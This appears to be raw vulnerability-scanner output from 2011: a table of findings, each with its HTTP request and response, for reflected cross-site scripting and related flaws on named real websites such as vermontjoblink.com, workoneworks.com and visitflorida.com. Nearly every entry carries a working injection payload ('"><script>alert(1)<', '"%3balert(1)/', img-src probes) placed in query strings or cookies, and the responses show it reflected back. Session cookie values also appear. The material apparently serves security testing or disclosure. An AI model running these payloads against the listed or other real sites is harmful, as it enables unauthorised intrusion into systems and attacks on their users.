| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:41:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98760 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... _type + "/" + sajax_target_id); target_id = sajax_target_id; if (typeof(sajax_request sajax_request_type = "GET"; uri = "/includes/js48bbc"-alert(1)- if (sajax_request_type == "GET") { if (uri.indexOf("?") == -1) uri += "?rs=" + escape(func_name); else uri += "&rs=" + escape(func_name); uri += "&rst= ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.visitflorida |
| Path: | /includes/js/footerSurvey |
| GET /includes/js/footerSurvey Host: www.visitflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ucr8rgmvej |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:41:54 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98784 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... ax_target_id); target_id = sajax_target_id; if (typeof(sajax_request sajax_request_type = "GET"; uri = "/includes/js/footer if (sajax_request_type == "GET") { if (uri.indexOf("?") == -1) uri += "?rs=" + escape(func_name); else uri += "&rs=" + escape(func_name); uri += "&rst=" + escape(sajax_ ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.workoneworks |
| Path: | / |
| GET /?513f2"><script>alert(1)< Host: www.workoneworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:41:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 580 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title>WorkOne: MAKE YOUR MOVE </title> <META name="description" content="WorkO ...[SNIP]... <frame src="http://www.in.gov ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.workoneworks |
| Path: | /favicon.ico |
| GET /favicon.ico?c8bb8"><script>alert(1)< Host: www.workoneworks.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 15:03:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 591 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title>WorkOne: MAKE YOUR MOVE </title> <META name="description" content="WorkO ...[SNIP]... <frame src="http://www.in.gov ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | https://secure.missi |
| Path: | /missingkids/servlet |
| GET /missingkids/servlet Host: secure.missingkids.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
| HTTP/1.1 200 OK Server: Sun-Java-System-Web Date: Sat, 30 Apr 2011 12:28:49 GMT Content-type: text/html;charset=UTF-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <!-- MKPAGE=ContentMain.jsp --> <html> <head> <title>National Center for Missing & Exploited Children</title> <!-- MK ...[SNIP]... <INPUT TYPE="hidden" NAME="referrer" VALUE="http://www.google ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.addthis.com |
| Path: | /bookmark.php |
| GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:29:29 GMT Server: Apache X-Powered-By: PHP/5.2.16 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96589 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>AddThis Social Bookmarking Sharing Button Widget</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> ...[SNIP]... b="";addthis_onload = [ function() { document.getElementById( var services = { '100zakladok':"100za ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.addthis.com |
| Path: | /bookmark.php |
| GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:29:30 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96613 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>AddThis Social Bookmarking Sharing Button Widget</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> ...[SNIP]... </script>d23ffaf1246" var services = { '100zakladok':"100za ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.addthis.com |
| Path: | /bookmark.php |
| GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:29:29 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96631 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>AddThis Social Bookmarking Sharing Button Widget</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.nist.gov |
| Path: | /cgi-bin/exit_nist.cgi |
| GET /cgi-bin/exit_nist.cgi HTTP/1.1 Host: www.nist.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s={"v":1,"rid": Referer: http://www.google.com |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:39:42 GMT Server: Apache NIST: g3 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 535 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org < ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
| Severity: | Low |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: http://www.google.com Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 283 usvuserid=&usvuserid ...[SNIP]... |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:57 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:08:57'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <form action="http://www.google ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | http://image.provide |
| Path: | /js/hic/safe-standard.js |
| GET /js/hic/safe-standard.js Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: image.providesupport.com Cookie: vsid=Gh9fR1o5MmIq71a17"-alert(1)- |
| HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Content-Length: 5012 Date: Sat, 30 Apr 2011 22:18:36 GMT Connection: close var psMygbsid = "Gh9fR1o5MmIq71a17"-alert(1)- // safe-standard@ie5up.js var psMygbiso; try { psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null); } catch(e) { psMygbiso = false; } if (psMygbiso) ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | http://image.provide |
| Path: | /js/hic/safe-textlink.js |
| GET /js/hic/safe-textlink.js Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: image.providesupport.com Cookie: vsid=69Yp4BH4IXZtad017"-alert(1)- |
| HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Content-Length: 4803 Date: Sat, 30 Apr 2011 22:18:36 GMT Connection: close var psNjc9sid = "69Yp4BH4IXZtad017"-alert(1)- // safe-textlink@ie5up.js var psNjc9iso; try { psNjc9iso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psNjc9wid != null); } catch(e) { psNjc9iso = false; } if (psNjc9iso) ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | http://seg.sharethis.com |
| Path: | /getSegment.php |
| GET /getSegment.php?purl=http Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://tn.gov/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __stid=CspT702sdV9LL |
| HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Sat, 30 Apr 2011 00:37:32 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 P3P: "policyref="/w3c/p3p.xml" Content-Length: 1368 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-type" content="text/html ...[SNIP]... <div style='display:none' userid: </div> ...[SNIP]... |
| Severity: | Information |
| Confidence: | Firm |
| Host: | http://view.atdmt.com |
| Path: | /iaction/adoapn |
| GET /iaction/adoapn Host: view.atdmt.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: AA002=1303072666-901854364d55"><a>b0cb33d534e; ach00=903d/120af:fb75 |
| HTTP/1.1 200 OK Cache-Control: no-store Content-Type: text/html Expires: 0 Vary: Accept-Encoding Date: Sat, 30 Apr 2011 15:09:04 GMT Connection: close Content-Length: 370 <html><body><img src="http://spe.atdmt.com ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /iApp/ret/content/landing |
| GET /iApp/ret/content/landing Host: www.nrsservicecenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: MyNRSCookie=72444256 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:57:51 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=751121AC73291 Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0001Cx8w Set-Cookie: MyNRSCookie=72444256 Set-Cookie: MyNRSSite=Ohio45765e4f Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 3474 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang="en" x ...[SNIP]... <div id="header" role="navigation"> [ServletException in:/WEB-INF/jspf/master </div> ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /iApp/ret/landing.do |
| GET /iApp/ret/landing.do HTTP/1.1 Host: www.nrsservicecenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: MyNRSCookie=72444256 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:54:11 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=F214AD8C73281 Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0001IjeLi Set-Cookie: MyNRSSite=Ohio4571e0f9 Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 3369 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang="en" x ...[SNIP]... <div id="header" role="navigation"> [ServletException in:/WEB-INF/jspf/master </div> ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /iApp/ret/showPage.do |
| GET /iApp/ret/showPage.do HTTP/1.1 Host: www.nrsservicecenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: MyNRSCookie=72444256 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:54:54 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=0B8DAA0273291 Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=00012Usdw Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 3492 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <div id="header" role="navigation"> [ServletException in:/WEB-INF/jspf/master </div> ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada |
| GET /ada HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=end9daa"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:19:21 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada |
| GET /ada HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enc1cb2"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:19:28 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENC1CB2";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/404/404_qry.cfm |
| GET /ada/404/404_qry.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en75aaa"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN75AAA";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/404/404_qry.cfm |
| GET /ada/404/404_qry.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en17dbd"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:56 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/customization |
| GET /ada/customization Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en3d0cc"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:43 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN3D0CC";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/customization |
| GET /ada/customization Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en6398b"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:34 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/customization |
| GET /ada/customization Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enacbaa"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:31 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/customization |
| GET /ada/customization Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en4d941"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:39 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN4D941";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/customization |
| GET /ada/customization Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:16:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENA13A7";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/customization |
| GET /ada/customization Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:16:46 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/default.cfm |
| GET /ada/default.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enb8806"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:17 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENB8806";ALERT(1)/ ...[SNIP]... |
